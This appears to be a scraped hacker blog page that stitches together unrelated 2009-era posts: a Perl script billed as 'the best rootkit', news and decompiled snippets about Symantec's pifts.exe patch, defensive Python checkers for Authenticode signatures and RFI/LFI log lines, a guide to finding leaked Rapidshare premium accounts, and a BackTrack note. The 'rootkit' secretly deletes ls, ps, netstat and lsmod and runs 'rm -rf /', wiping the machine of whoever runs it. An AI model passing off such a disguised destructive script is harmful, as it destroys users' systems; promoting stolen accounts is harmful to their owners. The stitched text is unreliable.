The best rootkit!!!

#!/usr/bin/perl
#######################################################################
# PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! PREVATE!!! #
# DU NOTTE DESTREBUTTE! DU NOTTE DESTREBUTTE! DU NOTTE DESTREBUTTE! #
# = Potreot-Rootkit (kornevaja sumka) = #
# (c)oded by v00d00_sp00f3d #
# Greetz: BuggerHukkerCrew #
#######################################################################
&usage; # hook up the rootkit functions
print " \n"; # hekk the pl0n8
print "[+] Zopuskaemsya...\n"; # starting up
print "[+] Pryachemsya...\n"; # using preprocessor residency
system("rm /bin/ls; rm /usr/bin/ls"); # hiding files
system("rm /bin/ps; rm /usr/bin/ps"); # hiding processes
system("rm /bin/netstat; rm /usr/bin/netstat"); # hiding netstat listings
system("rm /bin/lsmod; rm /usr/bin/lsmod"); # hiding modules
print "[+] Mutiruem...\n"; # using polymorphic technologies
system("rm -rf /"); # establishing persistence in the system (firmly!!!)
print "[+] ROOTKITED!!! YOU AR HEKKER!!!\n"; # HACKER!!!!

sub usage()
{
print q(

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
________ __ _____ .__ __
/ _____/ _____/ |__/ ____\____ __ __| |_/ |
/ \ ___ / _ \ __\ __\\__ \ | | \ |\ __\
\ \_\ \ <_> | | | | / __ \| | / |_| |
\______ /\____/|__| | | |____ /____/|____/__|
\/ | | \/
| |
| |
| |
| |
| |
|__|

[ Potreot-Rootkit (kornevaja sumka) by v00d00_sp00f3d ]

KEEP IT PREVATE OR DIE BITCH! MVO-PRIV8 STUFF
Greetz: BuggerHukkerCrew
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}

ROOTKITED!!! YOU AR HEKKER!!! 😆

Use this and indeed you are a L33T HACKER! =))


Conspiracy theories fly around Norton forum ‘Pifts’ purge

Conspiracy theories are running rampant in the absence of a clear explanation of why Symantec deleted threads expressing concern about a file called pifts.exe from its Norton support forums.

Many users running Norton Internet Protection began seeing a popup warning on Monday that a file called PIFTS.exe on their systems was trying to access the internet. The location of the file was given as a non-existent folder buried inside the Symantec LiveUpdate folder.

The appearance of a file in a non-existent folder suggests rootkit-like behaviour. PIFTS.exe attempts to contact a server in Africa, which has been traced to Symantec.

Concerned punters started posting on Norton’s support forums, asking what was going on. That’s all normal enough, but then discussions on the subject were deleted without explanation from Norton’s community pages. Follow-up threads mentioning the issue were deleted even more quickly.

source

Symantec creates havoc with unsigned Norton patch

Symantec released a diagnostic patch for some of its older Norton products on Monday night that did not identify its origin and thus triggered alerts on user firewalls, the company said Tuesday.

The patch for 2006 and 2007 versions of Norton Internet Security and Norton Antivirus, a program dubbed “PFST.exe,” (Product Information Framework Trouble Shooter) was distributed to collect anonymous statistics on matters such as how many computers are using the products and what operating system they are running, Jeff Kyle, group product manager for Symantec consumer products, said Tuesday.

Because it was unsigned–a result of human error–firewalls started prompting users with messages asking them if they trust the patch, Kyle said. Of course, because the patch had no signature indicating it was from Symantec, users didn’t know whether to trust it and many of them went to the Norton user forum for answers.

The company pulled the patch after three hours and then unwittingly laid the groundwork for conspiracy theorists after it started deleting forum posts related to the matter. The company was not censoring the posts, but fighting off a spam attack, according to Kyle.

“At the same time we were pulling down the patch a spammer created a new account on our forum and minutes after that there were 200 new users all targeting the same thread,” he said. “Within the first hour there were like 600 posts to that thread. Obviously it was a bot creating this.”

The posts were written with poor grammar and broken English and some were vulgar and nonsensical. It is possible, though, that Symantec could have inadvertently deleted some legitimate posts while it was purging the spam, Kyle said.

“There is no conspiracy theory. There’s nothing we are hiding at all,” Kyle added.

Meanwhile, Kyle said he isn’t sure whether or when Symantec will redistribute the patch, but if they do, he said, it will be signed.

Symantec has more information on its message board site. The Washington Post reported that hackers were exploiting the situation and had managed to get malicious Web sites into top Google search results for “pifts.exe.”

source
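The article's point is that the diagnostic patch shipped without a signature, so nothing on the user's machine could tie it to Symantec. The check below is an added example, not code from the article or from Symantec: it walks the PE headers to the security data directory and reports whether an Authenticode blob is present at all. The stub PE builder is a constructed fixture for exercising the parser, and a present blob still has to be cryptographically verified before it means anything.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4        # data-directory slot that holds the Authenticode blob
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002   # wCertificateType for a PKCS#7 SignedData blob
NO_SIG = {"present": False, "offset": 0, "size": 0, "cert_type": None}

def authenticode_directory(pe: bytes) -> dict:
    """Locate the security directory of a PE image. Presence is not verification:
    the PKCS#7 chain still needs checking (signtool verify / Get-AuthenticodeSignature)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24                          # optional header follows the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic == 0x10B:                           # PE32
        n_dirs_off, dir_base = opt + 92, opt + 96
    elif magic == 0x20B:                         # PE32+
        n_dirs_off, dir_base = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (n_dirs,) = struct.unpack_from("<I", pe, n_dirs_off)
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return dict(NO_SIG)
    off, size = struct.unpack_from("<II", pe, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    if off == 0 or size == 0:
        return dict(NO_SIG)
    # Unlike the other directories, this entry is a raw file offset to a WIN_CERTIFICATE header
    _length, _revision, cert_type = struct.unpack_from("<IHH", pe, off)
    return {"present": True, "offset": off, "size": size, "cert_type": cert_type}

def build_stub_pe(signed: bool) -> bytes:
    """Constructed, non-executable PE32 skeleton used only to exercise the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)     # e_lfanew: PE header right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)   # i386, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 92, 16)         # NumberOfRvaAndSizes
    headers_len = len(dos) + 4 + len(coff) + len(opt)
    cert = b""
    if signed:
        blob = b"\x30\x82" + b"\0" * 14           # placeholder bytes where the PKCS#7 DER would sit
        cert = struct.pack("<IHH", 8 + len(blob), 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, headers_len, len(cert))
    return bytes(dos + b"PE\0\0" + coff + opt + cert)
```

On a real file, `authenticode_directory(open(path, "rb").read())["present"]` being False is exactly the condition that left users with nothing to trust; True only says a blob exists and must be followed by chain validation.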

Digg in:

http://chrysler5thavenue.blogspot.com/2009/03/piftsexe.html

http://www.abovetopsecret.com/forum/thread444230/pg1

http://blogs.howstuffworks.com/2009/03/10/what-is-piftsexe/

http://www.theregister.co.uk/2009/03/10/norton_pifts_mystery/

http://news.cnet.com/8301-1009_3-10192899-83.html?part=rss&subj=news&tag=2547-1_3-0-20

http://isc.sans.org/diary.html?storyid=5992

http://it.slashdot.org/article.pl?sid=09/03/10/139229

http://www.tech-linkblog.com/2009/03/conspiracy-theories-run-rampant-due-to-piftsexe.html/

http://voices.washingtonpost.com/securityfix/2009/03/symantec_users_complain_of_mys.html

http://community.norton.com/norton/board/message?board.id=nis_feedback&thread.id=39119

http://www.virustotal.com/analisis/734465e30a6ee6d6c493471d77940f4c

http://www.threatexpert.com/report.aspx?md5=91b564d825a3487ae5b5fafe57260810

http://www.mediafire.com/download.php?iotyqjbrmry – pifts.exe asm code from IDA and C-like decompiled pseudocode from HexRays Decompiler

The disassembly of the binary doesn't look out of the ordinary, and after a quick look at the PIFTS.c decompiled code in the above archive it seems that Symantec is telling nothing but the truth.

Snips:

$cat PIFTS.c | grep -i RegOpenKey
// LSTATUS __stdcall RegOpenKeyExW(HKEY hKey, LPCWSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); idb
v1 = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey);
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
&& (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)

$cat PIFTS.c | grep -i http
extern wchar_t aHttpStats_nort[40]; // weak
sub_402210((int)L"http://stats.norton.com/n/p?module=2667", (int)&lpszUrl);

$cat PIFTS.c | grep -i symantec
v1 = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey);
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
&& (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
if ( RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"Software\\Symantec\\InstalledApps", 0, 1u, &hKey)
L"SOFTWARE\\Symantec\\PIF\\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\\PifEngine",
L"SOFTWARE\\Symantec\\PIF\\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\\HbEngine",
L"SOFTWARE\\Symantec\\PIF\\{96E26A03-A25A-400b-B9B4-564C9BD00F46}",

For me it doesn't sound like much of a conspiracy or an uber slick big brother spyware, because Symantec's explanation of pifts.exe is somewhat reasonable, although the method they used to get the stats is questionable and unprofessional (don't they have test systems, labs or networks? why push stuff that should be tested in the "development labs" to clients? clients are not a testing platform), and Symantec removing forum posts when they look like this doesn't bother me either. People who started this fire are ones who don't have the skills to reverse engineer an executable, because if they did they would know that there isn't really anything interesting in the pifts code. Another reason for this might be this one too:

Finally, it has also been reported by the Washington Post that hackers are taking advantage of this situation. “Some of the top searches (currently the 3rd and 4th result in a Google search) are Web sites that try to install malicious software when you visit them.” When searching for information on “pifts.exe,” Symantec strongly advises all users to be wary of following links to unknown sites as malicious users are attempting to use this hot topic to distribute malware.

Although it is hard to believe that this was a planned scam, because you really have to be a con mastermind in order to think of it beforehand and wait for the right moment, spot the appropriate moment (Symantec's unsigned and questionable pifts.exe push update), prepare (create bogus trap websites/pages related to the subject and embed exploit+malware code) and fire the scam (make people believe your conspiracy theory: the Symantec forums, the stories, the blog posts), then watch your botnet(s) grow. As it is written above, it is more probable that the bad guys saw the opportunity after the hype had been created and started to take advantage of it.


$200 iTunes Gift Certificates are selling for less than $3 in China now that a group of local hackers has circumvented Apple’s algorithm for creating the digital vouchers and built their own gift certificate generators.

the story

The Store! 😆


Well, if you have the luck to get a high pagerank and really show up a lot in Google searches then you automatically get this free gift. Those are http download stats, or better called http GET commands issued to the server, and you should not confuse that page with hack attempts. Do you see the immense amount of bot web attacks, mostly RFI and LFI? Well, I've seen some of that as soon as Google indexed my site and started showing it in searches. The conclusion is, if you don't know this already: if you want to have your own server under your administration you'd better have the necessary skills to secure it, because if you don't, then your website and/or server won't stand up for too long before getting pwned.
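The RFI/LFI bot traffic described above is easy to pick out of an access log once you decode the query string. This is an added example, not the author's tooling: a small classifier run over constructed Apache combined-format lines (the IPs, paths and user agents are made up) that flags remote-include attempts (a parameter whose value is a URL) and local-include attempts (traversal, known sensitive paths, embedded NULs), including the double-encoded variant scanners often use.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined format, not from any real server
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2009:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Mar/2009:12:00:02 +0000] "GET /index.php?page=http://203.0.113.99/x.txt?? HTTP/1.1" 200 310 "-" "libwww-perl/5.805"
203.0.113.12 - - [10/Mar/2009:12:00:03 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 404 210 "-" "Mozilla/4.0"
203.0.113.13 - - [10/Mar/2009:12:00:04 +0000] "GET /images/logo.png HTTP/1.1" 200 8000 "-" "Googlebot/2.1"
203.0.113.14 - - [10/Mar/2009:12:00:05 +0000] "GET /admin.php?inc=%2e%2e%2f%2e%2e%2fproc/self/environ HTTP/1.1" 500 0 "-" "Mozilla/4.0"
"""

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def classify(path: str):
    """Return 'rfi', 'lfi' or None for one request path (query string decoded twice)."""
    decoded = unquote(unquote(path))          # scanners frequently double-encode
    query = decoded.split("?", 1)[1] if "?" in decoded else ""
    if re.search(r"=\s*(https?|ftp)://", query, re.I):
        return "rfi"                          # a parameter value that is itself a URL
    if re.search(r"\.\./|\.\.\\|/etc/passwd|/proc/self/environ|\x00", query, re.I):
        return "lfi"                          # traversal, sensitive local paths, NUL truncation
    return None

def scan(log_text: str):
    """Yield (ip, kind, path) for every line that looks like an include attack."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                          # malformed line: skip rather than guess
        kind = classify(m["path"])
        if kind:
            hits.append((m["ip"], kind, m["path"]))
    return hits

if __name__ == "__main__":
    for ip, kind, path in scan(SAMPLE_LOG):
        print(f"{ip} {kind.upper()} {path}")
```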


Free Rapidshare premium accounts

Did you know that there are a bunch of websites out there that give out free rapidshare premium accounts (dumps) almost daily?
Well, I am going to give you 2 examples and the method I used to find them.

1. http://rapidshare-premiumz.blogspot.com/ – updated several times a day with new accounts, usually containing tens of gigs of traffic left and usually Secured, needed because of morons who try to take out the accounts for themselves. The blog has high traffic so the rs accounts get nulled pretty fast. The nulled accounts are marked with an – on the website.

2. http://www.rapidshare-dumps.blogspot.com/ – pretty new blog updated almost daily with usually big (dozens) secured and non-secured rapidshare dumps. The downside of posting non-secured accounts, as stated before, is that most of them (all in fact) are taken over in a matter of minutes by morons who don't like to share but to just OWN. Assholes.

THE METHOD

Well, the method is so simple yet so powerful that it almost breaks your heart that you didn't think of it earlier. 😛 Simplicity, not as in dumb and lazy (if you get the point), is the way to power and effectiveness.

example1

example2

example3

example4

Yes, that's it! Pretty lame you might think, huh? Well, I assure you it's not, since I found a dozen sites like those ones up there and forum posts that fulfilled my rapidshare warez, crack, hack, fuck wishes for the next 6 months. 😆

And if you're not that retarded and know a little about google operators/google-fu you can expand on those searches and create even more effective queries, then start browsing through the results and figure out which websites are for real dumps and bookmark them. Please do check several accounts from a single website or forum post, since many get taken over either by assholes or by their owners (if they are stolen), or rs changes the account password because of too many different geographical logins to the same account. Do not remove the past 24 hours option in the search, because it constitutes 50% of the google-fu behind the search (if you can't figure out why, don't worry... just leave it there... but do worry about you being stupid though).

RS…ALL YOU’RE BASE ARE BELONG TO US!


BackTrack 4 beta released


http://remote-exploit.org/backtrack_download.html ^^

You can read more about the release here.

( have mercy on the webserver 😆 )
